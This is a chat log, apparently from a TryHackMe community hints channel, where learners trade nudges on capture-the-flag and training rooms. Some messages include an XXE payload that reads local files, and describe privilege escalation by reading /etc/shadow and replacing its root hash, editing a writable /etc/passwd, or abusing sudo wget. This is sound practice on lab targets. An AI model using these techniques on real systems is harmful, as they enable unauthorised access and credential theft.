The second book has a LOT of weird characters
Books are available free as eBooks from Project Gutenberg, they're public domain works.
anyone ever did the weirdest exploits for hours for privesc and managed to make it work and in the end read that you can just sudo? :P
always check sudo first
usually 🙂
Hi guys, can i ask for further hints on room https://tryhackme.com/room/glitch?
Not yet please
oh i see. fresh room
im having a hard time on vulnnet
i'm having a hard time in dogcat. Tried a lot of things to trigger lfi such as php filters, wrappers, path truncation, nothing works. A small nudge might help me 😊
Hi Guys,
I was doing Buffer Overflow prep. have tried many times but not being able to get reverse shell from the target. I know it is not the To Do task but I think it should work. Have you ever tried it?
have you tried to see what you can access?
you'll also need to bypass a filter
i checked the writeup. I used the right filter before but i was trying to access /etc/passwd, should have tried to read the source instead
Ah yes
i would ask the creator of the room ustoun for something
@edgy inlet are you doing ustoun ? or you have completed ?
complete it
congrats, i started some minutes ago, seems interesting if someone wants join just to have fun pm me
thanks. yeah but i complete it less then 2 minutes, and when i read the flags i think i used other way.
you root this box in 2 minutes ? o_O
yeah
holy f.. awesome
I would like to ask him about this
Any hints for the AD Usernames in the room USTOUN? Currently stuck at getting a TGT via Impacket 🙂
Check pins
🤔
means no help for that room for now
Oh now I checked the pins, did know these exist ha,
Well you have to be able to laugh about yourself 
I've deleted your post as it provides hints for the ustoun room.
i came here to ask for the ustoun room's hints. xD. looks like hints for this room is not be shared yet.
anyone wanna help me with tomghost. I want to ask if the room has virtual hosting?
I don't recall it having a vhost
Has anyone done the CTF Collection Vol1?
I'm stuck on task 11. I tried ||exif|| but it says that the png is corrupt. I used ||binwalk|| which revealed that ||the png contained zlib compressed data|| but I can't figure out how to read it. I've done a lot of googling about ||zlib|| but haven't found a solution that works and based on the hint I'm not sure it's the right path.
is there anyone who completed "Password Security" https://tryhackme.com/room/passwordsecurity
I have, do you have a question?
yeah
a question i couldn't find the answer
#task : 2
question: 3
Q: a hash function is a ____function.
@toxic depot
First re-read the fourth paragraph. That should clear it up.
👍 anytime!
@toxic depot please don't just post answers
hi, I'm stuck with HackPark https://tryhackme.com/room/hackpark Task 4 3rd question... I think that should be ||WindowsScheduler.exe|| but answer not pass
That's not the correct answer. It's asking for the name of the service, not the name of the process
Try sc query
oh thanks
99% of the time, the room answer is not wrong
Hi ! Anyone here for a hint on Looking Glass challenge ?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Ask directly.
the room is "Looking glass" and as far as i am, i am able to get a weird version of a well-known text and i'm blocked. They ask me for a secret...
Ok. So it's ciphered. Get the full plaintext from that porr, and you'll get your secret
Yes i've already done that but i'm still stuck.. I've seen the added line at the end
Do you have an another hint ?
You need the plaintext from that. The line on the end provides your secret which is what it's asking for.
It's not asking for the key.
It's asking for the secret.
I have tried different ways since hours but so far I can't seem to decipher...
It's a known plaintext attack, the cipher used is super vulnerable for that
ok thanks !
doing the oscp bof room and when i try to overwrite eip with 0xBBBB as the retn i get access violation on 0x414141 instead
So that tells you something that needs to be fixed with your buffer.
indeed, i fixed it a while ago
Ok
any initial hint for ustoun?
No hints or help are provided for new room till 72 hours passes.
Need a hint for Linux Privesc room, task 4 (writeable shadow file). I replace root hash with my own hash in nano, but I get authentication failed when I try to su root with new password
after replacing the hash, I verify the new hash is actually written to the file with cat /etc/shadow, so that part is working
Fixed my mistake, I deleted too much in nano
hey guys, I am having difficulties with the OWASP Juice Shop room. I did it long time ago but did not finish it. Now I am stuck on Task 7 where it says: "In our last task, Proxy, we browsed to the website on our target machine (in this case OWASP Juice Shop)" --> Should the OWASP Juice Shop be installed on the machine I launched for this task already? I only launched the virtual Machine which I should have done in Task 6
Juice shop is running on the target machine in that room
There is the attackbox, and there is the target. They are different, and separate.
@stuck fractal Thanks. But where in on the Website of Tryhackme can I see the Target Machine? I just launched the "Attacker Machine" it seems - within Task 6 - Proxy. I am not sure where to find the "target Machine" credentials / Login etc. 😮
Click "start machine"
You do not need credentials or login details for the target
The IP for the target will be under Active Machine Information
That is all the information you need
Ahh I see, thanks a lot! 🙂
I was confused. I thought the IP shown there is for an additional Machine or something. But it is the IP of the webserver for the JuiceShop itself! Dang 🙂 Thanks again Ninja
im on the pickle rick ctf and i have found the user and password but cant seem to find any where to use them. just want a little nudge in the right direction. : )
if machine "USTOUN" is not under that 72 hours thing , can anyone give some hints for initial foothold
nvm i got it
Network Services 2, Task 6: Great, now- select the module and list the options. How do we do this?
The ||info|| command seems to do what it's asking, but the answer is 6 characters long. I have tried looking at the command list for Metasploit to see if I can find a command 6 characters long but I must be overlooking it or somehow overthinking this. Could I get a push in the right direction, please?
Try for 7
Any hint of USTOUN for initial foothold?
Please ask again in 16 minutes
Sure😂
I got it, strange answer since it's not the full command, but I got it. Thanks!
Good job 👍
For linux fundamentals part 1, it doesn't seem to have shiba1 binary on the attack box
You need to SSH into the VM in the room, from the attackbox
Or for part 1
You need to use the machine you deployed in the room with split screen mode. Not the attackbox.
Ok, thanks, got it
nvm got in, however from the flag names pretty sure unintended? is the creator about?
Any hint of USTOUN? enumerated all the ports and services. smb, rdp, enumerated users
@everyone
I am at „further nmap“ at „Introduction“. I am struggling with the research question. My research says that the answer is 1023 but tryhackme isn’t accepting this. Please help
Sorry I had to look deeper into the internet and found the answer
I could use a nudge in the OWASP top 10 room, on task 16
Question is "Where is falcon's SSH keys located?"
and I'm supposed to find it using an XXE exploit. So I've been trying different combos and spellings of the following:
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///home/||falcon||' >]>
<root>&read;</root>
But no luck so far, I'm not sure what I'm doing wrong as this syntax worked for printing the /etc/passwd file
That's a good start
But extend it to the location for SSH keys. The most popular name for the private key.
Doesn't it give you the path in the hint?
there's no hint, but you made me figure it out, thanks man 🙂
knew I was on the right trail
Ah, the room that part was taken from had it in the hint
yeah should have been a hint there imo but oh well 😄
Good day! I am having a "problem" in the "Network Services Room" in Task 4 "Exploiting SMB". I successfully connected to the named SMB-share. I can also see the document which should let me solve the Question "Who can we assume this profile folder belongs to?" but the document is empty when I open it with "more". I researched in the internet and there should be text in it which leads me to the answer. Any ideas?
are you trying to open it directly from the smb client or did you try downloading it locally first?
Oh, good idea. I tried to open it locally within the SMB client... That would explain why EVERY file was empty inside 😄
or did you look at more details when you ls it
I just tried to read it with "more" on the smbclient
I will try to pull the file and read it from Kali then
thanks a lot @ripe hedge
np 🙂
any hints for the foothold on ustoun?
One of the ports that is part of the intended path takes up to 10 minutes to become available. Rerun nmap after say 15 minutes. See if that helps. 🙂
Thank you, will do that
Good morning! I tried to add a new line with new user in the room: Exploiting Writeable /etc/passwd -> https://tryhackme.com/room/commonlinuxprivesc
even following the steps i am not able to login
Screenshots. Show us what you did. Show us what's happening.
are you su the correct account?
Was a good try,it should override the original root?
yes, in the previous machine i tried with empty password and other UID like new2:*:1008:0
but looks that you need to change /etc/group too
@cold dirge so what you missed, which the room hints at, is escaping the $
$ is a special char in bash usually used to access the value of variables.
Ok, thank you one more time @stuck fractal !
I'm looking for a hint with glitch. I am working on finding a way to root.txt Do I need to ||horizontally escalate to the other user|| before I can ||use the command with suid set||?
yes
Thank you. Just wanted to make sure 👍
anyone want to hint on USTOUN ? spend so many hours on it but still no foothold
There's one a little way up here
Good day, can anyone give me a tip or hint in room network services task 7 exploiting telnet last 2 questions im listinging on port 4444 and then on target machine I run the payload but dont get anything i must be missing something , thanks again
Screenshot?
Terminate and redeploy the target
You might have broken it earlier with a command that hanged/kept running
thank you sir will do that quickly
worked thanks sir
Hello guys i want to tell you something about some of the CTF challenges when all my thoughts and all the ways i tried are over , go to google and see solutions for challenge is this a useless way to gain experience? Please everyone share your opinion
For tryhackme? Before that, ask for hints.
If you learn from that, why not. You can make use of that knowledge in the next room. However, it could maybe lead to less of a challenge if you use it too much.
@pallid holly Yes i benefit, but i want to solve a challenge on my own. do you know when i solve a challenge on my own i feel indescribable happiness
I know the feeling 😁
Good morning! I'm having trouble figuring out why BurpSuite Sequencer won't capture any tokens for a cookie?
Specifically Burp Suite - Task 10
I've put the response into repeater and it's coming up as invalid session but im not sure how to rectify even after googling
you can just copy and paste the cookie from your browser to your burp session
i think that if you need to do some requests, Postman also works with the same cookie method
Hey all, I'm struggling with NMAP room, task 8 Q2.
"Why are NULL, FIN and Xmas scans generally used?"
For the life of me, no answer on stealthiness:
"All three are interlinked and are used primarily as they tend to be even stealthier, relatively speaking, than a SYN "stealth" scan."
works...
Any hints? Thoughts?
Thanks for the assist. Ill google them and see what i can do
Check the text above.
Sorry. Above what?
Actually read to the end of task 8, and you will find a summary of why these scans are used.
Got it. Thx.
anyone know what the intended way for ustoun is? i feel like i cheated
I'm in room networkservices, working on Task 7: Exploiting Telnet. I've made it all the way to the very last question where I'm now stuck. I've set up the reverse shell payload, and the nc listening port. I see that something happens... but I can't figure out where the supposed file (flag.txt) now can be found?
so did you get a reverse shell?
I do get a message Connection from [...] received! on the nc listener
can you type there?
something like pwd
or whoami
it should create an interactive session with the target system if done correctly
no problem 🙂
I was typing in the target machine rather than at the listener 🤭
mistakes happen 😉
There was a hint about a late opening port, that becomes apparent if you give it 15 minutes after starting. I think I've identified it, and found some options, though my first try was a dead end. Seems to crash a lot for me which doesn't help, don't know if others get that
Im sure it has something to do with what is mentioned in flag 1, although i cant find any vuln's for that.
Encouraging!
i see 2 major problems with this room, the username for the intended path doesn't appear in any wordlists that im aware of, and crackmap wont let you login with those credentials, because it keeps adding something to the start, which blocks login
EDIT need to add --local-auth flag derp
Back to the drawing board for my plan, then!😂😂
hey
can anyone help me with the machine BLUE
like im running the metasploit
but its showing me again and again
handler unable to bind
what should i do?
what port are you trying to bind to?
on the thm machine its 445
and on the vpn thing
like LPORT is 445
but i have tried 4444
too
whats tun0
also msf5 seems more reliable for that room
ohh
thats your vpn adapter
Not any more
msf5 gets it usually first go, msf6 takes a few times, in my experience
might be psychological
I'm in the networkservices2 room, at task 3. I've mounted, found the port, mounted, seen the correct directory name.... but there's not content in that dir (ls doesn't show anything). Could somebody give a hint as to what I'm missing?
ls -lah
thanks!!
Hi, anyone could give me some hint on room Internal pls? I can explain in MP what I already did and where I am stuck. Don't want to spoil here. Thx 😉
in networkservices2, on task 4, I've found the bash file, copied it out. I've set permissions first with +s, though that fails to set it to ending with -Sr-x (as it should according to the instructions). I've added the x with chmod, copied it to the share again and I'm logged in as the other user again. But then it results in ./bash permission denied.
So I've decided to restart all machines, and give the whole task another run. Same result though
the relevant line is
-rwSr-Sr-x 1 root [user] 1113504 [date, time ] bash
I'm not intimately familiar with exactly what you are doing but if its setting suid permission you might need to run +s again or +sx, the suid bit should be lowercase I believe
that did the trick!
nice
maybe that was too big of a hint but I dunno if that was part of the challenge
For room USTOUN, I have enumerated almost everything and still got no foothold. Does this room require brute-forcing ?
IIRC one of the ports takes like 15mins to open
Its been more than 30 mins but still can't find it. I guess I'll scan it again
Yes, please scan the target again. And it does include brute-forcing after username enumeration.
Can anyone help with Ustoun, I have enumerated a number of users, but having no luck brute forcing the password with kerbrute. Would welcome a nudge in the right direction. Thanks
Do not provide or ask for help or hints for the VulnNet: dotpy room until 10th April, 7pm (GMT)
Same :/
Any hints on Ustoun ? I can't find anything, tried || SMB|| but there's nothing I can do
See my previous post in this channel. 🙂
Hi all, hope all is well. I am working on Room: Investigating Windows 3.x. I'm looking in the .arn file for suspicious activity such that I can find the registry key for task 1. I've tried just about each of them, I thought for sure it was the key with entry 30000 but that doesn't seem to be the case. Am I headed down the right path here?
SOLVED - For those looking for help, the .arn file is the place to be.
the username may follow a convention for a service account, although there is no concrete convention for that
best way to find the username you want would be rid brute in crackmapexec
Thanks Pood, did not think of RID, just used a username list with Kerbrute as nothing showed up initially on Enum4linux on RID, will try CME.
For https://tryhackme.com/room/networkservices2, can someone get me a hint how to find 'john hash.txt'?
I googled and stumbled upon a whole walk answer blogpost, and while their answer likely is correct, it's not the route I want to take
Ah, sure. "Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found? "
I have John the Ripper, even started the room already to see if it was shared over there
it's under task 10 of networkservices2
Follow those steps to verify with the bot, then you can send images
I get the message "fopen: john hash.txt: No such file or directory"
Verify with the bot and screenshot please.
(john the ripper at this point is still new and never introduced)
It's a common pentesting tool, you can do research on how to use it. THM rooms are not standalone, they practically always need to be supported by your own research or prior knowledge
Here's the referral to john hash.txt. Where/how to find that file to run the hash I found against?
What file?
Screenshot this.
I do not know what you did to get that error, so the error itself isn't much use.
I've also tried /usr/share/wordlists/....
...
It just said john hash.txt. It did not tell you to use that as a wordlist.
If you do not supply a wordlist, John will use its default. In this case, the default is fine.
thank you
dont know if this is a hint or a help thing but in OWASP Top 10 task 16
"Where is falcon's SSH key located?"
how do I print things with the xxe, or something like "ls" command
Hello! I'm trying to solve the Attacktive Directory room. I found the user's password. I am trying to connect with the smbclient tool but it gives an error
Error message: smbclient //10.10.199.208/backup -U 'svc-admin'
Enter WORKGROUP\svc-admin's password:
session setup failed: NT_STATUS_LOGON_FAILURE
How can I solve this problem?
I've found around 26 open ports ( I am trying out rustscan hopefully i've got the syntax right) and enumerated the ||smb|| service and the ||http|| ports and found nothing. Using kerbrute i've tried enumerating valid usernames and found only the standard ||administrator|| and ||guest||. Don't know what to do try next
you need to create the hash.txt file yourself
use vi,vim,nano, or the text editor of your choosing and place the hashed password value inside of it and save it to hash.txt
it all worked out, thanks
Hey guys, in the https://tryhackme.com/room/psychobreak room, who is the SSH user? Isn't it ||kidman||? and isn't their password the one gotten after ||cracking the cellphone code||?
walkthrough shows 2 week ago
Obtain username through SMB enumeration. Bruteforce that account. Password re-use on another service for that user.
I'll try again thanks 🙂
anyone there about Memory Forensics room? i have an issue in it
Hey, just completed the box can i dm ?
Hi folks! need a bit of help. Attempting the Practical section on the NMAP training. This is provided "Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)?" What am I supposed to attack/scan? There's no IP listed.
Click the start machine button
right, have it on already. Am I just scanning my VM?
No.
You have not deployed the target machine if you are still seeing MACHINE_IP.
Click "Start Machine".
Not "Start AttackBox"
ok, got it. thanks, that helps.
Yeah
i can't seem to get any progress for the ustoun room, tried enumerating through smb, reran nmap a bunch of times :/ any hints to give?
I'm in room https://www.tryhackme.com/room/dnsmanipulation solving task 4 last question, which is: "What would the reverse-lookup be for the following IPv4 Address? (192.168.203.2) (Research)".
Have tried several reverse-lookup websites and have yet to get any proper answer since most of the result goes like -no reverse dns found. Can I get a hint on what I've been doing wrong?
Hey guys, anything on this: #room-hints message ??
well it's a private IP
there's a spec for that
if u want a reverse shell command u can use 0day websites
reverse lookup, not reverse shell
ahh sorry hydra
😉
I'm a drop the first link from google here https://en.wikipedia.org/wiki/Reverse_DNS_lookup
In computer networks, a reverse DNS lookup or reverse DNS resolution (rDNS) is the querying technique of the Domain Name System (DNS) to determine the domain name associated with an IP address – the reverse of the usual "forward" DNS lookup of an IP address from a domain name. The process of reverse resolving of an IP address uses PTR records. r...
apparently it applies to public ips as well
I'm doing Wgel CTF. I know I can ||run wget as sudo with no pw|| but any tips on how to escalate priv from there to gain root? I know I could just get the root flag with a simple command, but I'm trying to get root. ||I tried to get the sudoers file and edit it so that the jessie gets sudo rights with no pw to everything, but it breaks the sudoers file and I have to reboot the box.|||| I tried editing with visudo and sublime but neither worked. I just get syntax errors on all lines.|| So then I got the shadow file, to see if maybe root has a pw hash I could crack. There's only a ! in that field which I found out means it's locked. What does that mean? The user has the hash in the shadow file, so I'm cracking that with john right now, then when (if I can crack it) I know the password, I could copy that hash for the root as well and post the malicious shadow file back to the box. I wonder if I'm on the right path at all lol. Tips are welcome
@burnt sierra read through that
I'd imagine there are alternate ways to get root access, than from just cracking the shadow file
yes I did read it. I gained root ||by generating new hash for a password of my choice, replacing it in the shadow file I pulled with sudo wget, then replacing the original shadow with the malicious shadow with sudo wget back|| was really easy and fast now in hindsight
there was for the user that I used to get in the box in the first place
you're thinking if there ||was ssh key for root I could've pulled as the normal user?||
yeah perhaps
although, you could've just read the root flag I guess
your way seems a lot more interesting though
I intentionally did it this way because just getting the flag would've taught me nothing
yeah exactly, did you generate the root hash using openssl then?
i used mkpasswd -m sha-512
that works
thanks!
nevermind. I've found my issue. Thanks for making me try harder! 😄
Hello, I have a problem with the "Ustoun" box. I have the credentials of the user but I am blocked from getting a shell. Can someone give me a hint, if you don't mind?
Hello everyone, help me answer the question: What are automated tasks called in Linux?
You can most definitely find the answer with some googling